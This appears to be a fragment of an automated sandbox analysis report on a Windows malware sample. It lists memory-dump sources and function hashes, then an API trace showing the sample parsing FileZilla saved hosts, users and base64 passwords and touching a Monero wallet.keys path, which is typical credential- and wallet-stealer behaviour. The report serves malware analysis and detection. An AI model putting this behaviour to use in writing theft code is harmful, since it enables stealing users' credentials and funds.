                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: By~w
                              • API String ID: 0-883207314
                              • Opcode ID: 25e3ecc18e1ebf5b233052bb2f85376ab15405fab93bd371f1a4e4fc68018194
                              • Instruction ID: c3290b48cc0b03497df65225fb5dd2d309e5ae4cfd012e200f10f7443536bc79
                              • Opcode Fuzzy Hash: 25e3ecc18e1ebf5b233052bb2f85376ab15405fab93bd371f1a4e4fc68018194
                              • Instruction Fuzzy Hash: 2A4229F3A0C214AFE3046E6DEC8567ABBE5EF94620F16853DEAC4D7740E63598018793
                              Function 013C6ACD Relevance: 1.8, Strings: 1, Instructions: 565COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 4a4
                              • API String ID: 0-1365780938
                              • Opcode ID: b2874224c21b67ee11b0cac2d6dedc6d62cc7edf73b769850fa6a18cca403fd6
                              • Instruction ID: 80ad1d5ee91716d6f62c41452540f1daeebe2d0529fe1ec5384ef50d9872b3da
                              • Opcode Fuzzy Hash: b2874224c21b67ee11b0cac2d6dedc6d62cc7edf73b769850fa6a18cca403fd6
                              • Instruction Fuzzy Hash: 0F02D4F36086009FE704AE2DDC8576ABBE6EFD8320F1A893DD6C4C3744E63598458697
                              Function 01275F3D Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 6jz;
                              • API String ID: 0-3583987407
                              • Opcode ID: 91ac0c501b2e249521ff69caccb407584d8157d7401ba534ec489ed7fe1aee3b
                              • Instruction ID: 7cb33f5c9c63b7da015c01bbd03a53a1a716cc1b0fd02893d082571ca90ac4fd
                              • Opcode Fuzzy Hash: 91ac0c501b2e249521ff69caccb407584d8157d7401ba534ec489ed7fe1aee3b
                              • Instruction Fuzzy Hash: 46416AF3E0512457E3186E3DDC4477ABBD6DB90360F1B463EEA8993780E9795D0582C2
                              Function 0124F86C Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: p=8w
                              • API String ID: 0-3208007975
                              • Opcode ID: 34d9b93727dfd4962055878fbee9efa1cbc7f51003b86267983ace41a3b9bcf9
                              • Instruction ID: 5be143e80eb3f6765a2bf808a6b6d574b921ce6c3a6013fe1b50e551b5da7702
                              • Opcode Fuzzy Hash: 34d9b93727dfd4962055878fbee9efa1cbc7f51003b86267983ace41a3b9bcf9
                              • Instruction Fuzzy Hash: F7E0B671E10608EFEB48CF98C78469C7BB1EB8A340F608065D546AB259D2704B459B00
                              Function 013C85BA Relevance: .5, Instructions: 545COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3f6fc14766c69bf065e5937ef7583a55470e2c9607c85ea23de8f5fc020c4167
                              • Instruction ID: 7e3c66d504fe759cf1a4c937cf80aa85974a285961d763b74cefbe15ef2aa619
                              • Opcode Fuzzy Hash: 3f6fc14766c69bf065e5937ef7583a55470e2c9607c85ea23de8f5fc020c4167
                              • Instruction Fuzzy Hash: 8D02F7F390C6049FE304AF28DC8567AFBE5EF94720F064A2DEAC987744E63559448B87
                              Function 013449F6 Relevance: .2, Instructions: 230COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6b001ea54cd719db48b7be768c4efd3ecd59760b42afe81b31ef386eea2b0b65
                              • Instruction ID: 87c479a3311870d95142325f8df8b5f3fc20f36e829835bf75681ad240cf9d62
                              • Opcode Fuzzy Hash: 6b001ea54cd719db48b7be768c4efd3ecd59760b42afe81b31ef386eea2b0b65
                              • Instruction Fuzzy Hash: FB71F8F3A082149FE3146F29DC8577ABBE5EB94320F1A493CDBD497784EA3948058686
                              Function 013AF178 Relevance: .2, Instructions: 222COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cef32beab6c5bebf87c41f6914b4b5832566670c39cb6d3cae9819d1aad24ea3
                              • Instruction ID: d7d7a114e2b0249279b9c4723c34443d332b7e54ec86946b34afd0923312a80c
                              • Opcode Fuzzy Hash: cef32beab6c5bebf87c41f6914b4b5832566670c39cb6d3cae9819d1aad24ea3
                              • Instruction Fuzzy Hash: 846129F390C2109FE304AE2DEC8576AB7E5EF94310F1A853DEBC483784EA7958048697
                              Function 0130FE68 Relevance: .2, Instructions: 153COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f67a187568dfbe88ef8996c555226bb4e5cc232a3491fd37679a2c58f42bdb8e
                              • Instruction ID: 5ba328d8763884978de6c34de1d3af0ca517816c46a67279602aaabd5b7373ac
                              • Opcode Fuzzy Hash: f67a187568dfbe88ef8996c555226bb4e5cc232a3491fd37679a2c58f42bdb8e
                              • Instruction Fuzzy Hash: 244129F3D042004BF754A97CEC8676ABAD5DB94320F1A4A3CABD8C37C4F93D99018686
                              Function 012EF67F Relevance: .1, Instructions: 143COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c4c7e87757364f1fa3e21e0bb06e7428b56f2cea60255eb586b5aa402dec3028
                              • Instruction ID: 536381f53eeea92215545ef1aba8007b767de3f77ddbdeffc02680673027eb88
                              • Opcode Fuzzy Hash: c4c7e87757364f1fa3e21e0bb06e7428b56f2cea60255eb586b5aa402dec3028
                              • Instruction Fuzzy Hash: 0D418AF3A182089FF3041D28EC8573BB7DAE790760F2B863DAA85C3744D93A58054255
                              Function 01492AE8 Relevance: .1, Instructions: 113COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 70d34bbcefae9928e8dfd8a846bde45139e6883c9236fe3db2520fb0ebe4ce77
                              • Instruction ID: 21e14dfa8b92de52e6ba00140231df573445ddc75494732dba2a9eaf356a3591
                              • Opcode Fuzzy Hash: 70d34bbcefae9928e8dfd8a846bde45139e6883c9236fe3db2520fb0ebe4ce77
                              • Instruction Fuzzy Hash: A33183B390D2209FE705BE29D8915AAFBE5EF98360F16492DE9D4C3610D6315840CBD7
                              Function 01009750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 01000250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 01008DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01008E0B
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                                • Part of subcall function 00FF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                                • Part of subcall function 00FF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                                • Part of subcall function 00FF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                                • Part of subcall function 00FF99C0: LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                                • Part of subcall function 00FF99C0: CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                                • Part of subcall function 01008E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01008E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,01010DBA,01010DB7,01010DB6,01010DB3), ref: 01000362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01000369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 01000385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 01000393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 010003CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 010003DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 01000419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 01000427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 01000463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 01000475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 01000502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 0100051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 01000532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 0100054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 01000562
                              • lstrcat.KERNEL32(?,profile: null), ref: 01000571
                              • lstrcat.KERNEL32(?,url: ), ref: 01000580
                              • lstrcat.KERNEL32(?,00000000), ref: 01000593
                              • lstrcat.KERNEL32(?,01011678), ref: 010005A2
                              • lstrcat.KERNEL32(?,00000000), ref: 010005B5
                              • lstrcat.KERNEL32(?,0101167C), ref: 010005C4
                              • lstrcat.KERNEL32(?,login: ), ref: 010005D3
                              • lstrcat.KERNEL32(?,00000000), ref: 010005E6
                              • lstrcat.KERNEL32(?,01011688), ref: 010005F5
                              • lstrcat.KERNEL32(?,password: ), ref: 01000604
                              • lstrcat.KERNEL32(?,00000000), ref: 01000617
                              • lstrcat.KERNEL32(?,01011698), ref: 01000626
                              • lstrcat.KERNEL32(?,0101169C), ref: 01000635
